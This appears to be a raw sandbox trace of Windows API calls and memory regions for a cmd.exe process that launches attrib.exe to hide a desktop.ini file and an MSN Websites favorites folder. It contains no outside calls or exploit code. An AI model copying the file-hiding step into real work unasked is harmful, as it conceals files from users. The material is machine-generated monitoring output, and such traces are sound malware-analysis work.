(in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 
[0214.426] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.427] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0214.432] _close (_FileHandle=3) returned 0 [0214.432] GetConsoleTitleW (in: lpConsoleTitle=0x24f818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.432] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.432] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.432] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.433] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.433] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.433] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.433] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.433] GetConsoleTitleW (in: lpConsoleTitle=0x24f5ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.433] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f434, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f4fc | out: lpAttributeList=0x24f434, lpSize=0x24f4fc) returned 1 [0214.433] UpdateProcThreadAttribute (in: lpAttributeList=0x24f434, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f4f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f434, lpPreviousValue=0x0) returned 1 [0214.433] GetStartupInfoW (in: lpStartupInfo=0x24f3f0 | out: lpStartupInfo=0x24f3f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, 
cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.433] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.433] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f490*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f4dc | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessInformation=0x24f4dc*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf1c, dwThreadId=0xb2c)) returned 1 [0214.438] CloseHandle (hObject=0x50) returned 1 [0214.438] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.438] GetEnvironmentStringsW () returned 0x282d20* [0214.438] FreeEnvironmentStringsW (penv=0x282d20) returned 1 [0214.438] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0214.489] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f3d0 | out: lpExitCode=0x24f3d0*=0x0) returned 1 [0214.489] CloseHandle (hObject=0x4c) returned 1 [0214.489] _vsnwprintf (in: _Buffer=0x24f518, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f3dc | out: _Buffer="00000000") returned 8 [0214.489] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.489] GetEnvironmentStringsW () returned 0x282d20* [0214.489] FreeEnvironmentStringsW (penv=0x282d20) returned 1 [0214.490] SetEnvironmentVariableW 
(lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.490] GetEnvironmentStringsW () returned 0x282d20* [0214.490] FreeEnvironmentStringsW (penv=0x282d20) returned 1 [0214.490] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f434 | out: lpAttributeList=0x24f434) [0214.490] GetConsoleTitleW (in: lpConsoleTitle=0x24f818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.490] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.490] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.490] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.490] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.490] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.491] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.491] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.491] GetConsoleTitleW (in: lpConsoleTitle=0x24f5ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.491] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f434, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f4fc | out: lpAttributeList=0x24f434, lpSize=0x24f4fc) returned 1 [0214.491] UpdateProcThreadAttribute (in: lpAttributeList=0x24f434, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f4f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f434, lpPreviousValue=0x0) returned 1 [0214.491] GetStartupInfoW (in: lpStartupInfo=0x24f3f0 | out: lpStartupInfo=0x24f3f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.491] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.491] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f490*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f4dc | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessInformation=0x24f4dc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xde4, dwThreadId=0xe60)) returned 1 [0214.499] CloseHandle (hObject=0x4c) returned 1 [0214.499] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.499] GetEnvironmentStringsW () returned 0x283760* [0214.499] FreeEnvironmentStringsW (penv=0x283760) returned 1 [0214.499] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.557] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f3d0 | out: lpExitCode=0x24f3d0*=0x0) returned 1 [0214.557] CloseHandle (hObject=0x50) returned 1 [0214.557] _vsnwprintf (in: _Buffer=0x24f518, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f3dc | out: _Buffer="00000000") returned 8 [0214.557] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.557] GetEnvironmentStringsW () returned 0x283760* [0214.557] FreeEnvironmentStringsW (penv=0x283760) returned 1 [0214.557] 
SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.557] GetEnvironmentStringsW () returned 0x283760* [0214.558] FreeEnvironmentStringsW (penv=0x283760) returned 1 [0214.558] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f434 | out: lpAttributeList=0x24f434) [0214.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.558] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.558] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.558] SetConsoleInputExeNameW () returned 0x1 [0214.558] GetConsoleOutputCP () returned 0x1b5 [0214.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.558] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.559] exit (_Code=0) Process: id = "531" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0x994" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "530" os_parent_pid = "0xa74" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31628 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 
31629 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31630 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31631 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 31632 start_va = 0x210000 end_va = 0x216fff entry_point = 0x210000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31633 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31634 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31635 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31636 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31637 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31638 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31639 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31640 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = 
mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31641 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 31642 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 31643 start_va = 0x6dd20000 end_va = 0x6dd3cfff entry_point = 0x6dd20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31644 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31645 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31646 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31647 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31648 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31649 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 31650 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31651 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31652 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31653 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31654 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31655 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 31656 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31657 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 732 os_tid = 0xba0 Process: id = "532" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xf1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "530" os_parent_pid = 
"0xa74" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31658 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31659 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31660 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31661 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 31662 start_va = 0x9b0000 end_va = 0x9b6fff entry_point = 0x9b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31663 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31664 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31665 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: 
id = 31666 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31667 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31668 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31669 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31670 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31671 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 31672 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31673 start_va = 0x6e1e0000 end_va = 0x6e1fcfff entry_point = 0x6e1e0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31674 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31675 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31676 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 31677 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31678 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31679 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31680 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31681 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31682 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31683 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31684 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31685 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 31686 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31687 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 733 os_tid = 0xb2c Process: id = "533" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "530" os_parent_pid = "0xa74" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31688 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31689 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31690 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31691 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 31692 start_va = 0x6d0000 end_va = 0x6d6fff entry_point = 0x6d0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" 
(normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31693 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31694 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31696 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 31697 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31698 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31699 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31700 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31701 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31702 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type 